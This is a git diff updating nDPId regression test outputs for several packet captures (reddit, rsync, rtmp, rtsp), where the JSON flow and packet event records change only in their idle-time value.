+00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":636,"flow_first_seen":1605291687931,"flow_last_seen":1605291698785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7248,"flow_tot_l4_payload_len":748553,"flow_avg_l4_payload_len":1176,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291687896,"flow_last_seen":1605291688326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6703,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1605291690926,"flow_last_seen":1605291691154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10872,"flow_tot_l4_payload_len":111125,"flow_avg_l4_payload_len":1068,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8555,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691044,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8557,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1605291686985,"flow_last_seen":1605291698522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2333,"flow_tot_l4_payload_len":45370,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291690373,"flow_last_seen":1605291690520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5684,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","packets-captured":11682,"packets-processed":11682,"total-skipped-flows":0,"total-l4-data-len":10573423,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":59,"total-detection-updates":84,"total-updates":0,"current-active-flows":0,"total-active-flows":60,"total-idle-flows":60,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":447,"global_ts_msec":1605291698785} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 11682/11682 diff --git a/test/results/rsync.pcap.out b/test/results/rsync.pcap.out index 4a6aa54c8..c6c6bc183 100644 --- a/test/results/rsync.pcap.out +++ b/test/results/rsync.pcap.out 
@@ -1,11 +1,11 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rsync.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1387144174826} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1387144174826,"flow_last_seen":1387144174826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1387144174826,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387144174826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8ACBAAEAGPJp\/AAABfwAAAdTZA2mzXXC1AAAAAKACqqr+MAAAAgT\/1wQCCAoAPHCVAAAAAAEDAwo="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387144174826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAAQNp1NlRGhcWs11wtqASqqr+MAAAAgT\/1wQCCAoAPHCVADxwlQEDAwo="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387144174826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA0ACFAAEAGPKF\/AAABfwAAAdTZA2mzXXC2URoXF4AQACv+KAAAAQEICgA8cJUAPHCV"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1387144174826,"flow_last_seen":1387144174828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1387144174828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1387144174826,"flow_last_seen":1387144174967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":346,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387144174967,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1387144174826,"flow_last_seen":1387144174826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1387144174826,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387144174826,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8ACBAAEAGPJp\/AAABfwAAAdTZA2mzXXC1AAAAAKACqqr+MAAAAgT\/1wQCCAoAPHCVAAAAAAEDAwo="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387144174826,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAAQNp1NlRGhcWs11wtqASqqr+MAAAAgT\/1wQCCAoAPHCVADxwlQEDAwo="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387144174826,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA0ACFAAEAGPKF\/AAABfwAAAdTZA2mzXXC2URoXF4AQACv+KAAAAQEICgA8cJUAPHCV"} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1387144174826,"flow_last_seen":1387144174828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1387144174828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} 
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1387144174826,"flow_last_seen":1387144174967,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":346,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387144174967,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-data-len":497,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1387144174967} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 diff --git a/test/results/rtmp.pcap.out b/test/results/rtmp.pcap.out index c8b1e96f1..20966c547 100644 --- a/test/results/rtmp.pcap.out +++ b/test/results/rtmp.pcap.out 
@@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rtmp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1196541506793} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1196541506793,"flow_last_seen":1196541506793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1196541506793,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1196541506793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506793,"pkt":"AAwpfMZqAFBWwAAICABFAAAwAzJAAIAGH8TAqCsBwKgrgASZB49J0s7PAAAAAHAC\/\/+GgwAAAgQFtAEBBAI="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1196541506794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506794,"pkt":"AFBWwAAIAAwpfMZqCABFAAAwAABAAEAGYvbAqCuAwKgrAQePBJklcSWUSdLO0HASFtAknQAAAgQFtAEBBAI="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1196541506794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1196541506794,"pkt":"AAwpfMZqAFBWwAAICABFAAAoAzNAAIAGH8vAqCsBwKgrgASZB49J0s7QJXEllVAQ\/\/9oMQAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1196541506793,"flow_last_seen":1196541507028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2797,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1196541507028,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1196541506793,"flow_last_seen":1196541507836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6948,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1196541507836,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1196541506793,"flow_last_seen":1196541506793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1196541506793,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1196541506793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506793,"pkt":"AAwpfMZqAFBWwAAICABFAAAwAzJAAIAGH8TAqCsBwKgrgASZB49J0s7PAAAAAHAC\/\/+GgwAAAgQFtAEBBAI="} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1196541506794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506794,"pkt":"AFBWwAAIAAwpfMZqCABFAAAwAABAAEAGYvbAqCuAwKgrAQePBJklcSWUSdLO0HASFtAknQAAAgQFtAEBBAI="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1196541506794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1196541506794,"pkt":"AAwpfMZqAFBWwAAICABFAAAoAzNAAIAGH8vAqCsBwKgrgASZB49J0s7QJXEllVAQ\/\/9oMQAA"} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1196541506793,"flow_last_seen":1196541507028,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2797,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1196541507028,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} 
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1196541506793,"flow_last_seen":1196541507836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6948,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1196541507836,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":26,"total-skipped-flows":0,"total-l4-data-len":6948,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1196541507836} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 26/26 diff --git a/test/results/rtsp.pcap.out b/test/results/rtsp.pcap.out index d416118ec..412768948 100644 --- a/test/results/rtsp.pcap.out +++ b/test/results/rtsp.pcap.out 
@@ -1,47 +1,47 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rtsp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1627567277506} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} 